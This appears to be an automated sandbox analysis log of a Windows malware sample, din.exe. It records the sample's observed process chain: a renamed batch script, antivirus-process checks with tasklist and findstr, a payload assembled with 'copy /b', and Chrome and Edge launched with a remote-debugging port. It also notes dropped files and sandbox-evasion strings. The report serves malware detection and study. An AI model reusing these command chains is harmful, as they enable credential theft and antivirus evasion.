                Source: C:\Users\user\Desktop\din.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Appreciated Appreciated.cmd & Appreciated.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 322891
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "cache" Bulgaria
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Gc + ..\Large + ..\Rights + ..\Becomes I
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\322891\Centered.com Centered.com I
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 --field-trial-handle=2232,i,13166791472853580665,17998276385387722307,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2680 --field-trial-handle=2488,i,17259416842961834522,6867803032885323011,262144 /prefetch:3
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6520 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6628 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:8
                Source: C:\Users\user\Desktop\din.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Appreciated Appreciated.cmd & Appreciated.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 322891Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 322891Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Gc + ..\Large + ..\Rights + ..\Becomes IJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\322891\Centered.com Centered.com IJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 --field-trial-handle=2232,i,13166791472853580665,17998276385387722307,262144 /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2680 --field-trial-handle=2488,i,17259416842961834522,6867803032885323011,262144 /prefetch:3Jump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6520 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6628 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Users\user\Desktop\din.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\din.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: din.exeStatic file information: File size 1224479 > 1048576
                Source: din.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cryptosetup.pdbGCTL source: Centered.com, 00000010.00000002.2504659598.00000000049AC000.00000004.00000800.00020000.00000000.sdmp, 5F3EKF.16.dr
                Source: Binary string: cryptosetup.pdb source: Centered.com, 00000010.00000002.2504659598.00000000049AC000.00000004.00000800.00020000.00000000.sdmp, 5F3EKF.16.dr
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                Source: din.exeStatic PE information: real checksum: 0x13605c should be: 0x13af04
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F20DE6 push ecx; ret 16_2_00F20DF9

                Persistence and Installation Behavior

                barindex
                Drops PE files with a suspicious file extension
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\322891\Centered.comJump to dropped file
                Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\322891\Centered.comJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile created: C:\ProgramData\NGVAAIE3W4EU\5F3EKFJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile created: C:\ProgramData\NGVAAIE3W4EU\5F3EKFJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comFile created: C:\ProgramData\NGVAAIE3W4EU\5F3EKFJump to dropped file

                Boot Survival

                barindex
                Monitors registry run keys for changes
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F926DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,16_2_00F926DD
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F1FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,16_2_00F1FC7C
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\din.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\din.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\din.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\din.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\din.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\din.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\din.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\din.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\din.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\din.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\din.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\din.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_16-105384
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: Centered.com, 00000010.00000003.1613510624.00000000049CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comDropped PE file which has not been started: C:\ProgramData\NGVAAIE3W4EU\5F3EKFJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comAPI coverage: 3.7 %
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
